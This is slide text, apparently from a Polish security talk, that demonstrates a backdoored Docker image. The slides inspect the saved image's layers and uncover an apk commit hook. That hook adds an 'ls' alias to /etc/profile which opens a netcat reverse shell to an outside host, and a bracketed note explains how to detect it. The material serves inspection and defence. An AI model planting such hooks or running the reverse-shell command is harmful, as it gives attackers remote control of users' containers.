13. 13www.sii.pl
Zagrożenie lawinowe
root@ubuntu-bionic:/tmp/testing# docker build --add-host dl-cdn.alpinelinux.org:127.0.0.1 -t bad_little_o_me:0.0.1 .
Sending build context to Docker daemon 2.048kB
Step 1/3 : FROM alpine/semver:latest
---> 3731a612aafc
Step 2/3 : RUN apk add libmnl
---> Running in 428559229f39
fetch http://dl-cdn.alpinelinux.org/alpine/v3.8/main/x86_64/APKINDEX.tar.gz
ERROR: http://dl-cdn.alpinelinux.org/alpine/v3.8/main: could not connect to
server (check repositories file)
fetch http://dl-cdn.alpinelinux.org/alpine/v3.8/community/x86_64/APKINDEX.tar.gz
ERROR: http://dl-cdn.alpinelinux.org/alpine/v3.8/community: could not connect
to server (check repositories file)
(1/1) Installing libmnl (1.0.4-r0)
ERROR: libmnl-1.0.4-r0: could not connect to server (check repositories file)
1 error; 6 MiB in 15 packages
The command '/bin/sh -c apk add libmnl' returned a non-zero code: 1
14. 14www.sii.pl
Zagrożenie lawinowe
Step 2/3 : RUN apk add libmnl vim
---> Running in f71aac264745
fetch http://dl-cdn.alpinelinux.org/alpine/v3.8/main/x86_64/APKINDEX.tar.gz
ERROR: http://dl-cdn.alpinelinux.org/alpine/v3.8/main: could not connect to server
(check repositories file)
fetch http://dl-cdn.alpinelinux.org/alpine/v3.8/community/x86_64/APKINDEX.tar.gz
ERROR: http://dl-cdn.alpinelinux.org/alpine/v3.8/community: could not connect to server
(check repositories file)
(1/6) Installing libmnl (1.0.4-r0)
ERROR: libmnl-1.0.4-r0: could not connect to server (check repositories file)
ERROR: lua5.3-libs-5.3.4-r5: could not connect to server (check repositories file)
(2/6) Installing lua5.3-libs (5.3.4-r5)
(3/6) Installing ncurses-terminfo-base (6.1-r0)
ERROR: ncurses-terminfo-base-6.1-r0: could not connect to server (check repositories
file)
(4/6) Installing ncurses-terminfo (6.1-r0)
ERROR: ncurses-terminfo-6.1-r0: could not connect to server (check repositories file)
(5/6) Installing ncurses-libs (6.1-r0)
(6/6) Installing vim (8.1.0115-r0)
ERROR: ncurses-libs-6.1-r0: could not connect to server (check repositories file)
ERROR: vim-8.1.0115-r0: could not connect to server (check repositories file)
6 errors; 6 MiB in 15 packages
The command '/bin/sh -c apk add libmnl vim' returned a non-zero code: 6
18. 18www.sii.pl
I see tar gzips, tar gzips everywhere.
Zagrożenie lawinowe
root@ubuntu-bionic:/home/vagrant# docker save -o ./bad_me__0.0.2.tar bad_me:0.0.2
root@ubuntu-bionic:/home/vagrant# tar tf ./bad_me__0.0.2.tar
3fc60f14dfa1ca867ff2d5ca06295b257fcc0f44aee088fdea6b65a0521d2100.json
5cd7b42b4fc96b6be1b22abf175843faa0abdf36c94a3d1269eab9ef39829b1b/
5cd7b42b4fc96b6be1b22abf175843faa0abdf36c94a3d1269eab9ef39829b1b/VERSION
5cd7b42b4fc96b6be1b22abf175843faa0abdf36c94a3d1269eab9ef39829b1b/json
5cd7b42b4fc96b6be1b22abf175843faa0abdf36c94a3d1269eab9ef39829b1b/layer.tar
8f52818719ad48a0af558ae2a44eed3cb3fe080f13c9fbdc67ef15667af59196/
8f52818719ad48a0af558ae2a44eed3cb3fe080f13c9fbdc67ef15667af59196/VERSION
8f52818719ad48a0af558ae2a44eed3cb3fe080f13c9fbdc67ef15667af59196/json
8f52818719ad48a0af558ae2a44eed3cb3fe080f13c9fbdc67ef15667af59196/layer.tar
e67ec36488c7b11b263233332c3811099eeeba13433f3cdecae7da26cf26fc03/
e67ec36488c7b11b263233332c3811099eeeba13433f3cdecae7da26cf26fc03/VERSION
e67ec36488c7b11b263233332c3811099eeeba13433f3cdecae7da26cf26fc03/json
e67ec36488c7b11b263233332c3811099eeeba13433f3cdecae7da26cf26fc03/layer.tar
eff8bc50c94715ebf4e13b2c0c3000c81b97b6b3aef12291c1b570808384193d/
eff8bc50c94715ebf4e13b2c0c3000c81b97b6b3aef12291c1b570808384193d/VERSION
eff8bc50c94715ebf4e13b2c0c3000c81b97b6b3aef12291c1b570808384193d/json
eff8bc50c94715ebf4e13b2c0c3000c81b97b6b3aef12291c1b570808384193d/layer.tar
f3a308ee6406d0714117434facfe67ccb347f34f071971f2628edfe0c62ff75e/
f3a308ee6406d0714117434facfe67ccb347f34f071971f2628edfe0c62ff75e/VERSION
f3a308ee6406d0714117434facfe67ccb347f34f071971f2628edfe0c62ff75e/json
f3a308ee6406d0714117434facfe67ccb347f34f071971f2628edfe0c62ff75e/layer.tar
manifest.json
repositories
19. 19www.sii.pl
I see tar gzips, tar gzips everywhere.
Zagrożenie lawinowe
root@ubuntu-bionic:/home/vagrant# tar xOf ./bad_me__0.0.2.tar manifest.json
[
{
"Config": "3fc60f14dfa1ca867ff2d5ca06295b257fcc0f44aee088fdea6b65a0521d2100.json",
"RepoTags": [
"bad_me:0.0.2"
],
"Layers": [
"8f52818719ad48a0af558ae2a44eed3cb3fe080f13c9fbdc67ef15667af59196/layer.tar",
"e67ec36488c7b11b263233332c3811099eeeba13433f3cdecae7da26cf26fc03/layer.tar",
"f3a308ee6406d0714117434facfe67ccb347f34f071971f2628edfe0c62ff75e/layer.tar",
"5cd7b42b4fc96b6be1b22abf175843faa0abdf36c94a3d1269eab9ef39829b1b/layer.tar",
"eff8bc50c94715ebf4e13b2c0c3000c81b97b6b3aef12291c1b570808384193d/layer.tar"
]
}
]
20. 20www.sii.pl
I see tar gzips, tar gzips everywhere.
Zagrożenie lawinowe
root@ubuntu-bionic:/home/vagrant# tar xOf ./bad_me__0.0.2.tar eff8bc50c94715ebf4e13b2c0c3000c81b97b6b3aef12291c1b570808384193d/layer.tar | tar t
etc/
etc/apk/
etc/apk/commit_hooks.d/
etc/apk/commit_hooks.d/.wh..wh..opq
etc/apk/commit_hooks.d/x
etc/apk/world
etc/profile
lib/
lib/apk/
lib/apk/db/
lib/apk/db/installed
lib/apk/db/lock
lib/apk/db/scripts.tar
lib/apk/db/triggers
usr/
usr/lib/
21. 21www.sii.pl
I see tar gzips, tar gzips everywhere.
Zagrożenie lawinowe
root@ubuntu-bionic:/home/vagrant# tar xOf ./bad_me__0.0.2.tar eff8bc50c94715ebf4e13b2c0c3000c81b97b6b3aef12291c1b570808384193d/layer.tar | tar xO etc/apk/commit_hooks.d/x
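#!/bin/sh
echo “alias ls=”if [ ”$(pgrep nc)” == ”” ]; then (nc 3lite.eu 12345 -e /bin/sh
&); sleep 3; fi; /bin/ls” >> /etc/profile”
[Note: the curly quotes above most likely come from the slide typesetting rather than from the file itself. What the listing shows is an apk commit hook, shipped inside an image layer, that appends an `ls` alias to /etc/profile when it runs; a login shell started in the container, such as the `sh -l` on the later slide, then reads that alias. Listing every layer of the saved image and reading anything under etc/apk/commit_hooks.d/ and any change to etc/profile, as done on these slides, is the check that exposes it.]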
34. 34www.sii.pl
Kopmy głęboko
root@ubuntu-bionic:/home/vagrant# docker run -it --rm bad_me:0.0.2 sh -l
85aefda95768:/# cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.4 85aefda95768
85aefda95768:/# vi /etc/hosts
85aefda95768:/# ls
bin dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var
85aefda95768:/# ls
bin dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var
85aefda95768:/# ls
bin dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var
85aefda95768:/#